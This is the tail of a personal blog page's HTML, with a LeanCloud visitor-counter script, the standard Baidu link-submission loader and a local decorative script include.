              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

  

  

  <script type="text/javascript" src="/js/src/love.js"></script>
</body>
</html>
